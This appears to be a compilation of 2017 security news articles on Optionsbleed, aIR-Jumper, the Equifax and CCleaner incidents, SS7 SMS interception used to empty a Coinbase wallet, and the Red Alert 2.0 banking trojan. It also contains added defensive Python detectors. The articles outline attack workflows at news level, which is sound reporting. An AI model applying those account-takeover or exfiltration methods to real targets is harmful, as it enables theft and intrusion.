
Additionally, the company pushed Xcode 9 to plug seven security flaws in Git, ld64, and subversion, all of which could lead to arbitrary code execution. While Git and subversion were affected by a single issue each, ld64 had five security vulnerabilities. Xcode 9 is available for macOS Sierra 10.12.6 or later users.

Apple also released iTunes 12.7 and iTunes 12.7 for Windows, along with tvOS 11 and watchOS 4, to address bugs in them, but has not yet provided details on the content of these patches.


'Optionsbleed' Flaw Causes Apache to Leak Data
20.9.2017 securityweek Hacking
A vulnerability found in Apache HTTP Server (httpd) can cause certain systems to leak potentially sensitive data in response to HTTP OPTIONS requests, a researcher warned.

The flaw was discovered by freelance journalist and security researcher Hanno Böck, who has dubbed it “Optionsbleed.” Despite a fancy name modelled on Heartbleed, the critical OpenSSL vulnerability, because both “bleed” memory contents, Optionsbleed is not as severe or as widespread.

Böck was analyzing HTTP methods in an effort to determine if they have any vulnerabilities when he noticed that requests with the OPTIONS method, which allows a client to ask a server which HTTP methods it supports, were returning what appeared to be corrupted data via the “Allow” header.

Typically, responses to OPTIONS requests should contain a list of supported HTTP methods in the Allow header (e.g. “Allow: GET, POST, OPTIONS, HEAD”). However, some of the responses to the researcher’s requests looked like this:

Allow: POST,OPTIONS,,HEAD,:09:44 GMT

Allow: GET,HEAD,OPTIONS,,HEAD,,HEAD,,HEAD,, HEAD,,HEAD,,HEAD,,HEAD,POST,,HEAD,, HEAD,!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"

Allow: GET,HEAD,OPTIONS,=write HTTP/1.0,HEAD,,HEAD,POST,,HEAD,TRACE

Further analysis revealed that Apache leaked server memory due to a use-after-free bug. The flaw, which could result in the exposure of sensitive data, has been assigned the CVE identifier CVE-2017-9798.

What makes the Optionsbleed flaw less severe is the fact that the targeted system needs to be configured in a certain way for an attack to work, and the response doesn’t always contain other data. Requests sent by the expert to the Alexa Top 1 Million websites resulted in corrupted Allow headers from only 466 of them.

Apache is one of the most widely used web servers. Data from Netcraft shows that Apache was used by roughly 40 percent of the top million most visited websites in August.

With help from Apache developer Jacob Champion, Böck determined that the flaw only affects specific configurations.

“Apache supports a configuration directive Limit that allows restricting access to certain HTTP methods to a specific user. And if one sets the Limit directive in an .htaccess file for an HTTP method that's not globally registered in the server then the corruption happens,” the researcher explained. “Setting a Limit directive for any invalid HTTP method in an .htaccess file caused a use after free error in the construction of the Allow header which was also detectable with Address Sanitizer.”

While the security bug does not pose a risk for a majority of websites using Apache, it could represent a serious problem in shared hosting environments.

“The corruption is not limited to a single virtual host. One customer of a shared hosting provider could deliberately create an .htaccess file causing this corruption hoping to be able to extract secret data from other hosts on the same system,” Böck warned.
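Two defender-side checks, added here as example code rather than anything from Böck's PoC or the Apache project: the first inspects an Allow header value for the malformed members seen in the leaked responses quoted above (empty list members, fragments that are not valid HTTP method tokens, repeated methods), the second scans an .htaccess file for Limit/LimitExcept directives naming methods Apache does not register, the configuration the researcher identified as the trigger. The method list is an assumption drawn from Apache's built-in method registry, and the sample .htaccess is constructed.

```python
import re

# Added example; not the researcher's PoC and not Apache code.

# Assumption: the HTTP method names Apache httpd registers by default. A site
# that registers extra methods in the main server config should add them here.
APACHE_BUILTIN_METHODS = frozenset({
    "GET", "HEAD", "PUT", "POST", "DELETE", "CONNECT", "OPTIONS", "TRACE", "PATCH",
    "PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK",
    "VERSION-CONTROL", "CHECKOUT", "UNCHECKOUT", "CHECKIN", "UPDATE", "LABEL",
    "REPORT", "MKWORKSPACE", "MKACTIVITY", "BASELINE-CONTROL", "MERGE",
})

# RFC 7230 "token": one or more tchar. A real method name is always a token.
TOKEN_RE = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")

# Opening <Limit ...> / <LimitExcept ...> section tags (directive names are
# case-insensitive in Apache configuration).
LIMIT_RE = re.compile(r"<\s*Limit(?:Except)?\s+([^>]+)>", re.IGNORECASE)


def allow_header_anomalies(value):
    """Return a list of anomalies found in an Allow header value.

    A healthy header is a comma-separated list of distinct method tokens,
    e.g. "GET, POST, OPTIONS, HEAD". The leaked responses show empty members
    (",,"), repeated methods and fragments of unrelated memory (dates, HTML,
    request lines), none of which a correctly working Apache emits.
    """
    anomalies = []
    seen = set()
    for raw in value.split(","):
        member = raw.strip()
        if member == "":
            anomalies.append("empty list member")
        elif not TOKEN_RE.match(member):
            anomalies.append(f"non-token member: {member!r}")
        elif member in seen:
            anomalies.append(f"repeated method: {member}")
        seen.add(member)
    return anomalies


def unregistered_limit_methods(htaccess_text):
    """Return method names used in <Limit>/<LimitExcept> blocks that Apache
    does not register. The comparison is exact because HTTP method names are
    case-sensitive, so "get" is as unregistered as "FOOBAR"."""
    found = []
    for match in LIMIT_RE.finditer(htaccess_text):
        for method in match.group(1).split():
            if method not in APACHE_BUILTIN_METHODS:
                found.append(method)
    return found


# Constructed sample .htaccess: one ordinary block and one that names a
# method Apache has never registered.
SAMPLE_HTACCESS = """\
<Limit GET POST>
    Require valid-user
</Limit>
<Limit FOOBAR>
    Require all denied
</Limit>
"""

if __name__ == "__main__":
    # One clean header and one of the corrupted Allow values from the article.
    for header in ("GET, POST, OPTIONS, HEAD", "POST,OPTIONS,,HEAD,:09:44 GMT"):
        print(header, "->", allow_header_anomalies(header) or "ok")
    print("unregistered methods:", unregistered_limit_methods(SAMPLE_HTACCESS))
```

Running the header check against your own server's OPTIONS responses, or the .htaccess scan across customer directories on a shared host, gives a quick read on whether the triggering configuration is present before a patched httpd build is deployed.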

The expert pointed out that the leaks were evident in a paper on support for HTTP methods that was published in May 2014, roughly one month after Heartbleed came to light, but no one noticed the problem at the time.

Böck said the Apache security team could not provide an estimated date for when a patch would become available, so he decided to make his findings public before a fix was included in a new Apache httpd release. Optionsbleed can still be patched by making source code changes. Several Linux distributions have also started releasing fixes.

Böck has released a proof-of-concept (PoC) script for Optionsbleed and Sophos has published a blog post with a detailed technical description of the flaw.


Twitter Suspends Nearly 1 Million Accounts Associated with Terrorism
20.9.2017 securityweek Social

Twitter has suspended a total of 935,897 accounts for the promotion of terrorism between August 1, 2015, and June 30, 2017, the company says in its latest transparency report.

A total of 299,649 accounts were suspended during the first half of 2017, marking a 20% decrease compared to the previous six-month period, the company reveals. 95% of the account suspensions were the result of internal efforts, the social platform claims.

These are “accounts that actively incite or promote violence associated with internationally recognized terrorist organizations, promote internationally recognized terrorist organizations, and accounts attempting to evade prior enforcement,” Twitter explains.

According to the social media network, 75% of the accounts suspended during the January-June 2017 timeframe were blocked before posting their first tweet. The sustained effort to eliminate such activity from the platform has resulted in an 80% drop in government reports on such accounts, compared to the previous six months.

However, government requests accounted for less than 1% of account suspensions, as they only amounted to 338 reports referring to 1,200 accounts. They also represented only 2% of the reports received from governments around the world, which totaled 16,818 reports in the six-month period.

The largest number of such reports were received for abusive behavior, at 16,414, which represented 98% of global government TOS (Terms of Service) reports. These referred to 6,299 accounts, of which only 12% were actioned; the majority of requests did not result in content removal.

Twitter also received 37 requests related to copyright, and 29 reports related to trademark. These are non-legal requests submitted by government representatives about content that might violate the company’s rules against copyright and trademark infringement.

In its transparency report, the social platform says it received a total of 6,448 global government requests for account information from January through June 2017, up 6% from the previous period, but affecting 3% fewer accounts. Some of the requests originated from four new countries, namely Nepal, Paraguay, Panama, and Uruguay.

Twitter also reveals that it received around 10% more global legal requests to remove content, and that these impacted roughly 12% more accounts compared to the previous reporting period. Such requests came from various countries, including nine new ones: Bahrain, China, Croatia, Finland, Nepal, Paraguay, Poland, Qatar, Ukraine, and Uruguay.

In the United States, the company received a total of 2,111 account information requests that specified 4,594 accounts, and also received 118 removal requests. The U.S. continues to account for the majority of global government requests for account information.

“United States submitted 33% of all worldwide requests for user account information. Interestingly, the total number of requests from U.S. law enforcement and government entities decreased by 8% and those requests affected 18% fewer accounts from last report to this report. This marks the third straight report where we’ve seen a decrease in U.S. requests,” Twitter says.

During the first half of 2017, Washington, D.C. was the top U.S. requester, submitting 14.3% of total requests, followed by California with 13.8% of the requests. In the timeframe, the San Francisco-based company received 245 non-California state-issued subpoenas and court orders, down from 295 during the previous reporting period.


aIR-Jumper – A malware exfiltrates data via security cameras and infrared
20.9.2017 securityaffairs Virus

Researchers at the Ben-Gurion University developed a PoC malware dubbed aIR-Jumper that uses security cameras with Infrared capabilities to exfiltrate data.
The team of researchers at the Ben-Gurion University of the Negev in Israel, composed of Mordechai Guri, Dima Bykhovsky and Yuval Elovici, developed a PoC malware that leverages security cameras with infrared capabilities to steal data.

The security cameras are used as a covert channel for data exfiltration and to send commands to the malicious code.

Modern surveillance and security cameras are equipped with infrared LEDs for night vision. The experts chose them because infrared light is invisible to the human eye, making it impossible for users to notice the data transmission through LED blinking.

The same research team has devised numerous techniques to exfiltrate data from air-gapped networks across the years, including DiskFiltration, AirHopper, BitWhisper, LED-it-Go, SPEAKE(a)R, USBee, Fansmitter, xLED.

The current research project, dubbed aIR-Jumper, relies on malicious code that must be installed on the target computers, either on the machine that controls the surveillance cameras and their software, or on a computer in the same network as the camera.

“In this paper, we show how attackers can use surveillance cameras and infrared light to establish bi-directional covert communication between the internal networks of organizations and remote attackers. We present two scenarios: exfiltration (leaking data out of the network) and infiltration (sending data into the network).” reads the paper published by the team, titled “aIR-Jumper: Covert Air-Gap Exfiltration/Infiltration via Security Cameras & Infrared (IR)”.

The malicious code is able to steal data from an infected system and convert it into a sequence of ones and zeros that is then transmitted by making the device’s infrared LEDs blink.

“By blinking the IR LEDs an attacker can leak sensitive data stored on the device, such as credentials and cryptographic keys, at a speed of 15 bit/sec. However, in their method the attacker must find a way to insert the compromised hardware into the organization. In contrast, our method uses the IR LEDs that already exist in surveillance and security cameras and doesn’t require special or malicious hardware.” continues the paper.

On the other end, an attacker within range of the security camera’s infrared LEDs can receive the blinking and use an application developed by the team to reconstruct the stream of data sent through the LED blinking.

The researchers also demonstrated that an attacker can use an infrared LED to send new commands to a security camera inside an infected network. The malicious code developed by the experts analyzes the camera’s video feed, detects infrared LED transmissions and converts the incoming blinks into new commands.

The experts implemented a malware prototype, evaluated it with different models of cameras, and discussed preventive and defensive countermeasures.

“Our evaluation shows that an attacker can use IR and surveillance cameras to communicate over the air-gap to a distance of tens to hundreds of meters away. We demonstrate how data can be leaked from the network at a bit rate of 20 bit/sec (per camera) and be delivered to the network at bit rate of more than 100 bit/sec (per camera).” states the paper.

The exfiltration speed obtained by the researchers is low compared to that obtained with other techniques tested by the same group. In July, the team led by Mordechai Guri developed specific firmware dubbed xLED that allowed them to control a router’s LEDs while the router was working. The router LEDs were used to exfiltrate data from air-gapped networks with better performance than aIR-Jumper.

The researchers explained that infrared signals are better than router LEDs because infrared light bounces off nearby surfaces with a higher reflection rate, which means that attackers don’t necessarily need a line of sight to the camera.

In the following table, the aIR-Jumper technique is compared with others devised by the research team:

[Table: comparison of aIR-Jumper with the team’s other air-gap covert channels, not reproduced here]

In their research paper, the team proposes a series of software and hardware countermeasures, such as window shielding, IR LED activity monitoring, firmware controls for disabling IR support, detection of irregular access to camera API functions, suspicious traffic detection (LED control), and also covering or disconnecting the LEDs.
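As an added example (not from the paper or the researchers’ tooling) of the “IR LED activity monitoring” countermeasure listed above: a small detector that takes a per-frame record of the camera’s IR LED state and flags one-second windows in which the LED toggles far more often than night-vision control would ever switch it. The sample stream and the one-toggle-per-second threshold are constructed assumptions.

```python
# Added example: detection logic for the "IR LED activity monitoring"
# countermeasure. Not code from the aIR-Jumper paper or its authors.


def count_toggles(states):
    """Count on/off transitions inside a sequence of LED states (1=on, 0=off)."""
    return sum(1 for prev, cur in zip(states, states[1:]) if prev != cur)


def suspicious_windows(states, sample_hz, window_s=1.0, max_toggles_per_s=1.0):
    """Return the start times (seconds) of non-overlapping windows whose
    toggle rate exceeds max_toggles_per_s.

    Legitimate night-vision control switches the IR LEDs a handful of times
    a day (dusk, dawn, lighting changes). A modulated data stream such as the
    paper's 20 bit/s exfiltration channel flips them many times per second,
    so a plain rate threshold separates the two. Transitions that straddle a
    window boundary are not counted, which at worst delays detection by one
    window.
    """
    window = int(sample_hz * window_s)
    flagged = []
    for start in range(0, len(states) - window + 1, window):
        toggles = count_toggles(states[start:start + window])
        if toggles / window_s > max_toggles_per_s:
            flagged.append(start / sample_hz)
    return flagged


# Constructed 12-second sample at 30 frames/s (assumption: one LED state per
# frame, e.g. read from the camera's API or an LED current sensor):
#   0-5 s   LED off (daylight)
#   5-7 s   LED on (night vision engaged, a single legitimate switch)
#   7-9 s   LED modulated at 5 toggles/s (3 frames on, 3 frames off)
#   9-12 s  LED on, steady
SAMPLE_HZ = 30
SAMPLE_STATES = ([0] * 150) + ([1] * 60) + ([1, 1, 1, 0, 0, 0] * 10) + ([1] * 90)


if __name__ == "__main__":
    for t in suspicious_windows(SAMPLE_STATES, SAMPLE_HZ):
        print(f"suspicious IR LED activity in window starting at {t:.1f} s")
```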

I reached Mordechai Guri for a comment:

“This air-gap covert-channel is unique since it allow attackers to establish a bi-directional communication with a remote attacker, like a TCP/IP connection with IR signals and security cameras: you can send a request and receive a response. Almost all existing air-gap covert-channels allows only one way communication”

The experts published two PoC videos that show how they send commands to the aIR-Jumper malware via the security camera, and how they exfiltrate data from the affected network.


Equifax Breach Affects 100,000 Canadians
20.9.2017 securityweek Cyber
Equifax revealed on Tuesday that the recent data breach affects roughly 100,000 Canadian consumers, but the company’s systems in Canada were not compromised.

Equifax Canada said the company’s investigation is still ongoing, but it believes the incident affects approximately 100,000 Canadians. Similar to the United States, the exposed information includes names, addresses, social insurance numbers, and, in some cases, credit card numbers.

“Equifax Canada can confirm that Canadian systems are not affected. We have found no evidence of unauthorized activity on Equifax's core consumer or commercial credit reporting databases. Equifax Canada systems and platforms are entirely separated from those impacted by the Equifax Inc. cybersecurity incident widely reported in the U.S.,” the company said.

Impacted individuals will be notified via mail and they will be offered credit monitoring and identity theft protection services for one year at no charge.

Equifax said it notified MasterCard and Visa about the payment cards compromised in the breach. The company has also informed the Privacy Commissioner of Canada (OPC), the Commissioners in Alberta, British Columbia, and Quebec, and consumer reporting registrars in Ontario, Alberta and Saskatchewan.

While the number of individuals affected by the breach in Canada has only now come to light, some Canadian consumers launched a class action lawsuit within a week of disclosure. The initiators of the suit are seeking damages of $550 billion CAD ($450 billion US).

Equifax said cybercriminals had access to its U.S. systems between mid-May and late July after leveraging an Apache Struts 2 vulnerability that had been exploited in the wild since March.

The company said the breach affects roughly 143 million U.S. consumers and 400,000 customers in the United Kingdom. In the case of the U.K., the credit reporting agency revealed that the data was stored on U.S. systems between 2011 and 2016 due to a “process failure.” No such explanation has been provided by Equifax Canada.

Equifax stock has dropped from roughly $140 to just over $90 following the breach and experts believe it could plunge as low as $50. The incident has already cost the company nearly $10 billion in market value.

The company’s Chief Security Officer and Chief Information Officer retired after the hack came to light.

In the United States, the Federal Trade Commission (FTC), congressional committees, and the Attorneys General in 40 states have announced the launch of investigations into the Equifax breach.


Wikileaks Spy Files Russia – the surveillance apparatus implemented by the firm Peter-Service
20.9.2017 securityaffairs BigBrothers

Wikileaks has released a new batch of documents that claim to detail the Russian mass surveillance apparatus implemented with the help of the firm Peter-Service.
The batch, dubbed Spy Files Russia, details the surveillance infrastructure implemented by Russia. The Kremlin’s surveillance apparatus allows Russian agencies to spy on online activities and mobile devices.

According to Wikileaks’ Italian media partner, the newspaper La Repubblica, the documents cover “an extended timespan from 2007 to June 2015”.


WikiLeaks (@wikileaks) tweeted on Sep 19, 2017, 11:25 AM: “RELEASE: Spy Files #Russia https://wikileaks.org/spyfiles/russia/ … #SORM #FSB”

This is the first time Wikileaks has leaked material related to the Russian state. The documents describe a Russian company that supplies software to telecommunication companies and also installs the equipment that Russian state agencies use to tap into them.

It is a surveillance apparatus that enables Russian intelligence to search and spy on citizens’ digital activity.

Wikileaks released 34 “base documents” relating to the activity of a St. Petersburg-based company called Peter-Service. The company is a contractor for Russian state surveillance; it was set up in 1992 to provide billing solutions and is a major supplier of software to mobile telecoms operators.

“The technologies developed and deployed by PETER-SERVICE today go far beyond the classical billing process and extend into the realms of surveillance and control. Although compliance to the strict surveillance laws is mandatory in Russia, rather than being forced to comply PETER-SERVICE appears to be quite actively pursuing partnership and commercial opportunities with the state intelligence apparatus.” reported Wikileaks

“As a matter of fact PETER-SERVICE is uniquely placed as a surveillance partner due to the remarkable visibility their products provide into the data of Russian subscribers of mobile operators, which expose to PETER-SERVICE valuable metadata, including phone and message records, device identifiers (IMEI, MAC addresses), network identifiers (IP addresses), cell tower information and much more. This enriched and aggregated metadata is of course of interest to Russian authorities, whose access became a core component of the system architecture.”

[Figure: PETER-SERVICE software architecture, from the Wikileaks documents]

It is interesting to note that the leaked documents never reference the Russian intelligence agency, the FSB, but “speak only of state agencies.”

Under Russian law, operators must maintain a Data Retention System (DRS) that stores data for up to three years.

“The Peter-Service DRS system allows Russian state agencies to query the database of all stored data to search for information such as calls made by a certain telephone company customer, the payment systems used, the cell that served the specific mobile. The manuals published by WikiLeaks contain the images of the interfaces that allow agents to search within this huge trove of data, so access is simple and intuitive.” wrote Stefania Maurizi, on the Italian media outlet La Repubblica.

According to Wikileaks, Peter-Service’s DRS solution can handle 500,000,000 connections per day in a single cluster; the system is high-performance, with a claimed average search time of ten seconds for subscriber-related records from a single day.

“The data retention system is a mandatory component for operators by law; it stores all communication (meta-)data locally for three years. State intelligence authorities use the Protocol 538 adapter built into the DRS to access stored information.” continues Wikileaks.

Peter-Service has also developed a system called TDM (Traffic Data Mart) that records and monitors IP traffic for all mobile devices registered with the operator.

The system enables Russian agencies to track the online activity of targets, including visited sites, forums and social media.

The TDM maintains a list of categorized domain names — “which cover all areas of interest for the state. These categories include blacklisted sites, criminal sites, blogs, webmail, weapons, botnet, narcotics, betting, aggression, racism, terrorism and many more”.

“Based on the collected information the system allows the creation of reports for subscriber devices (identified by IMEI/TAC, brand, model) for a specified time range: Top categories by volume, top sites by volume, top sites by time spent, protocol usage (browsing, mail, telephony, bittorrent) and traffic/time distribution.”

Wikileaks points to a 2013 Peter-Service slideshow presentation published on the company website that focuses on a new product called DPI*GRID; the product is hardware for Deep Packet Inspection that takes the form of “black boxes” apparently able to handle 10Gb/s of traffic per unit.

“However, the core of the presentation is about a new product (2013) called DPI*GRID – a hardware solution for “Deep Packet Inspection” that comes literally as “black boxes” that are able to handle 10Gb/s traffic per unit.” continues Wikileaks. “The national providers are aggregating Internet traffic in their infrastructure and are redirecting/duplicating the full stream to DPI*GRID units. The units inspect and analyse traffic (the presentation does not describe that process in much detail); the resulting metadata and extracted information are collected in a database for further investigation. A similar, yet smaller solution called MDH/DRS is available for regional providers who send aggregated IP traffic via a 10Gb/s connection to MDH for processing.”

[Figure: Russian surveillance infrastructure, second diagram from the Wikileaks documents]

Peter-Service argues that Moscow must be able to make better use of the power of data and rely on itself. “Who controls the information, controls the world,” concludes Peter-Service, pointing out how much of America’s power under President Obama rests on the NSA’s mass surveillance, as revealed by Snowden.

“Drawing specifically on the NSA Prism program, the presentation offers law enforcement, intelligence and other interested parties, to join an alliance in order to establish equivalent data-mining operations in Russia,” it adds — sticking its boot firmly back into U.S. government mass surveillance programs.


Popular CCleaner tool contains malware, a quick update is needed
20.9.2017 SecurityWorld Hacking
An update of the popular PC optimisation and cleaning tool CCleaner contained dangerous malware. If this malware is installed on a user’s computer, hackers can gain access to the user’s computer as well as to other connected systems.

They can then gain access to sensitive data or to login credentials for internet banking or other accounts. The incident was reported by the Cisco Talos security team.

The 32-bit Windows version 5.33.6162, which was available for download between 15 August and 12 September 2017, contained dangerous malware that infected users’ devices during the update.

At this point the infected version has been withdrawn and is no longer available. Nevertheless, many users remain at risk even after updating the tool. CCleaner Cloud, version 1.07.3191, was also infected.

[Figure] Source: Cisco

According to Avast, which currently owns CCleaner, the compromise occurred before the acquisition of Piriform, the original developer of CCleaner. The acquisition took place in mid-July 2017, but the program had already been compromised via a backdoor at the beginning of July.

The number of affected users is also said to be relatively low: Avast speaks of 2.27 million in total, and thanks to a proactive approach to updating as many users as possible, there are now only 730,000 users still running the affected version (5.33.6162).

According to Avast, these users should upgrade their programs as soon as possible, even though they are reportedly not at risk, because the malware has been disabled on the C&C server side.

CCleaner is one of the most widespread tools for cleaning and optimising computing devices. It can easily remove unneeded applications and thereby speed up computers and smartphones. By the end of 2016 the program had exceeded 2 billion downloads, and its user base was growing by 5 million every week.


Here’s How Hackers Can Hijack Your Online Bitcoin Wallets
19.9.2017 thehackernews Hacking
Researchers have been warning for years about critical issues with the Signaling System 7 (SS7) that could allow hackers to listen in private phone calls and read text messages on a potentially vast scale, despite the most advanced encryption used by cellular networks.
Despite fixes being available for years, global cellular networks have consistently ignored this serious issue, saying that exploiting the SS7 weaknesses requires significant technical and financial investment and therefore poses a very low risk to people.
However, earlier this year we saw real-world attacks: hackers used this design flaw in SS7 to drain victims' bank accounts by intercepting the two-factor authentication code (one-time passcode, or OTP) sent by banks to their customers and redirecting it to themselves.
If that incident wasn't enough for the global telecoms networks to consider fixing the flaws, white hat hackers from Positive Technologies have now demonstrated how cybercriminals could exploit the SS7 flaw to take control of online bitcoin wallets and steal all your funds.
Created in the 1980s, SS7 is a telephony signalling protocol used by over 800 telecom operators across the world, including AT&T and Verizon, to interconnect and exchange data, such as routing calls and texts to one another, enabling roaming and other services.
Here's How Hackers Hacked into a Bitcoin Wallet and Stole Funds

While demonstrating the attack, the Positive researchers first obtained the Gmail address and phone number of the target, and then initiated a password reset request for the account, which involved a one-time authorization token being sent to the target's phone number.
Just like in previous SS7 hacks, the Positive researchers were able to intercept the SMS messages containing the 2FA code by exploiting known design flaws in SS7 and gain access to the Gmail inbox.
From there, the researchers went straight to the Coinbase account that was registered with the compromised Gmail account and initiated another password reset, this time, for the victim's Coinbase wallet. They then logged into the wallet and emptied it of crypto-cash.
Fortunately, this attack was carried out by security researchers rather than cybercriminals, so there wasn't any actual fraud of bitcoin cryptocurrencies.
This issue looks like a vulnerability in Coinbase, but it's not. The real weakness resides in the cellular system itself.
Positive Technologies has also posted a proof-of-concept video, demonstrating how easy it is to hack into a bitcoin wallet just by intercepting text messages in transit.
Different SS7 Attack Scenarios
This attack is not limited to cryptocurrency wallets. Any service, be it Facebook or Gmail, that relies on two-step verification is vulnerable to the attacks.
The design flaws in SS7 have been known since 2014, when a team of researchers at German Security Research Labs alerted the world to them.
The flaws could allow hackers to listen to phone calls and intercept text messages on a potentially massive scale, despite the most advanced encryption used by cellular network operators.
Last year, the researchers from Positive Technologies also gave demonstrations of WhatsApp, Telegram, and Facebook hacks using the same design flaws in SS7 to bypass the two-factor authentication used by those services.
On the TV program 60 Minutes, Karsten Nohl of German Security Research Labs last year demonstrated the SS7 attack on US Congressman Ted Lieu's phone number (with his permission), and successfully intercepted calls to his iPhone, recorded a call, and tracked his precise location in real time just by using his cell phone number and access to an SS7 network.
Since the network operators are unable to patch the issues anytime soon, there's little a smartphone user can do, beyond this:
Avoid using two-factor authentication via SMS texts for receiving OTP codes. Instead, rely on cryptographically-based security keys as a second authentication factor.


Red Alert 2.0: New Android Banking Trojan for Sale on Hacking Forums
19.9.2017 thehackernews Android

The recent discoveries of dangerous variants of the Android banking Trojan families, including Faketoken, Svpeng, and BankBot, present a significant threat to online users who may have their login credentials and valuable personal data stolen.
Security researchers from SfyLabs have now discovered a new Android banking Trojan that is being rented on many dark web sites for $500 per month, SfyLabs' researcher Han Sahin told The Hacker News.
Dubbed Red Alert 2.0, the Android banking malware has been written from scratch, unlike other banking trojans, such as BankBot and ExoBot, which evolved from the leaked source code of older trojans.
The Red Alert banking malware has been distributed via many online hacking forums for the last few months, and its creators have continuously been updating the malware to add new functionality in an effort to make it a dangerous threat to potential victims.
Malware Blocks Incoming Calls from Banks
Like most other Android banking trojans, Red Alert has a large number of capabilities such as stealing login credentials, hijacking SMS messages, displaying an overlay on the top of legitimate apps, contact list harvesting, among others.
Besides this, Red Alert actors have also added an interesting functionality to its malware, like blocking and logging all incoming calls associated with banks and financial associations.
This would potentially allow the Red Alert malware to prevent warnings of a compromised account to be received by the victims from their associated banks.
Malware Uses Twitter As Backup C&C Infrastructure

Another interesting feature of Red Alert 2.0 is that it uses Twitter to avoid losing bots when its command and control server is knocked offline.
"When the bot fails to connect to the hardcoded C2 it will retrieve a new C2 from a Twitter account," SfyLabs researchers said in a blog post.
"This is something we have seen in the desktop banking malware world before, but the first time we see it happening in an Android banking trojan."
Red Alert 2.0 currently targets customers of more than 60 banks and social media apps across the world, and works on Android 6.0 (Marshmallow) and earlier versions.
Here's How the Red Alert 2.0 Trojan Works:
Once installed on the victim's phone via a third-party app store, the malware waits for the victim to open a banking or social media app whose interface it can simulate. As soon as it detects one, the Trojan overlays the original app with a fake user interface.
The fake interface then tells the victim that an error occurred while logging in and asks them to re-authenticate their account.
As soon as the user enters credentials into the fake interface, Red Alert records them and sends them to the attacker-controlled command and control (C&C) server, where the attackers use them to hijack the account.
In the case of banking apps, the attackers use the recorded information to initiate fraudulent transactions and drain the victim's bank account.
Since Red Alert 2.0 can also intercept SMS text messages received by the infected smartphone, the trojan can work around the two-factor authentication techniques that are otherwise designed to thwart such attacks.
Ways to Protect Yourself Against Such Android Banking Trojans
The easiest way to avoid becoming a victim of such mobile banking Trojans is not to download apps from third-party app stores or from links provided in SMS messages or emails.
To be on the safer side, go to Settings → Security and make sure the "Unknown sources" option is turned off on your Android device; this blocks the installation of apps from unknown sources.
Most importantly, check app permissions before installing any app, even from the official Google Play Store, and if an application asks for more than it needs, do not install it.
It is always a good idea to install an anti-virus app from a reputable vendor that can detect and block such Trojans before they infect your device.
Also, always keep your system and apps up to date.


Android AV App Collected Data on Tens of Millions of Users
19.9.2017 securityweek Android
Tens of millions of Android users potentially had their information collected by a security application distributed through Google Play, Check Point security researchers warn.

Called DU Antivirus Security, the software had between 10 and 50 million downloads when the security researchers alerted Google to its data collection practices on August 21. The application was removed from the store on August 24, but was reinstated on August 28, after its developers removed the information-collecting code.

Offered for free, the security software is developed by the DU group, and was discovered to collect a variety of user data without requesting consent from the device owner. The data collection activities, the security researchers discovered, were performed only at the application’s first run.

According to Check Point, the information the application collected from Android devices included unique identifiers, the contact list, call logs and potentially the device's location. After gathering the information, the app encrypted it and sent it to a remote server.

The security researchers also discovered that the collected information was then used by another app offered by the DU group, namely Caller ID & Call Block – DU Caller. The software is designed to provide users with information about incoming phone calls.

“While users trusted DU Antivirus Security to protect private information, it did the exact opposite. It collected the personal information of its users without permission and used that private information for commercial purposes,” Check Point notes.

The software would log information on personal calls, including who the user talked to and for how long. DU Antivirus Security 3.1.5 includes the malicious code, and previous releases potentially do too.

The same data-collecting code was found in 30 other applications, including 12 programs distributed through Google Play, Check Point reveals in a report. The apps, which have been removed, had between 24 and 89 million downloads in total. Affected users are advised to upgrade to newer versions of DU Antivirus Security and any other impacted app.

The malicious code was supposedly implemented in these applications through an external library, but they transmitted the collected data to the same server used by DU Caller, the security researchers say.

“Since anti-virus apps have a legitimate reason to request unusually extensive permissions, they are the perfect cover for fraudsters looking to abuse these permissions. In some cases, mobile anti-virus apps are even used as a decoy for delivering malware. Users should be aware of these suspicious anti-virus solutions, and use only mobile threat protection from reputable vendors that are proven to be capable of safeguarding mobile devices and the data stored in them,” Check Point notes.

The security researchers discovered that the malicious code would send the gathered data to the server caller.work. While the domain isn’t registered to DU apps, it has two subdomains that reveal a connection to the developer.

One is reg.caller.work, a PHP webpage that specifies hostname us02-Du_caller02.usaws02 (which contains the name of the DU Caller app). The other is vfun.caller.work, hosted on a private server that also hosts the domain dailypush.news, which is registered to a Baidu employee. DU apps are part of the Baidu group and the employee posted about functionality related to the caller app, which indicates a connection with the data collected by the malicious code.

The DU Caller app has already been criticized for its ambiguous privacy policy, which displays different terms on separate pages, and for carrying out activity regardless of whether it has the user's consent. DU Caller was also involved in one of the largest data breaches, which exposed over 2 billion user phone numbers earlier this year, a Risk Based Security report revealed in July.


EU to Launch Cybersecurity 'Safety Labels'
19.9.2017 securityweek Cyber
The European Union unveiled plans Tuesday to step up its response to cyber attacks, including a new intelligence-sharing agency, cyber war games and product safety labels.

The proposals by the European Commission, the executive arm of the 28-nation bloc, come amid growing concerns over election hacking by foreign states, ransomware attacks and other cybercrime like identity theft and bank fraud.

"Cyberattacks are becoming more frequent, imaginative and global," Andrus Ansip, the European Commission Vice President for the Digital Single Market, told a press conference. "The EU needs to respond to them 24/7."

Building on an existing agency based in Greece, the new EU Cybersecurity Agency would help countries deal with cyber threats. It would also organise yearly pan-European cybersecurity exercises and ensure better sharing of intelligence.

The agency would also help create EU-wide certificates -- much like the labels currently used for food safety -- for trusted energy, transport and other networks, as well as for new consumer devices such as connected cars.

"I want high cybersecurity standards to become the new competitive advantage of our companies," said Mariya Gabriel, commissioner for the digital economy and society.

The EU will also launch cyber defence training next year and work with Brussels-based NATO on the issue.

Meanwhile the commission also unveiled fresh steps towards creating what it calls a digital single market for data for the world's biggest free-trade bloc of around 500 million people and worth tens of billions of euros.

It proposed the free flow of non-personal data across the bloc, rather than have member states require firms to store and process data within their borders, unless there are public security reasons.

The new rules still have to be approved by EU states and the European Parliament.


New Android Banking Trojan Red Alert 2.0 available for sale on crime forums
19.9.2017 securityaffairs Android

Researchers discovered a new Android banking Trojan, dubbed Red Alert 2.0, that is being offered for rent on many dark websites for $500 per month.
Researchers with security firm SfyLabs have discovered a new Android banking Trojan, dubbed Red Alert 2.0, that is being offered for rent on many dark websites for $500 per month.

“The last several months a new actor has been very busy developing and distributing a new Android trojan dubbed ‘Red Alert 2.0’ by the actor. The bot and panel (C&C) are fully written from scratch, while many other trojans are evolutions of leaked sources of older trojans.” reads a blog post published by SfyLabs.

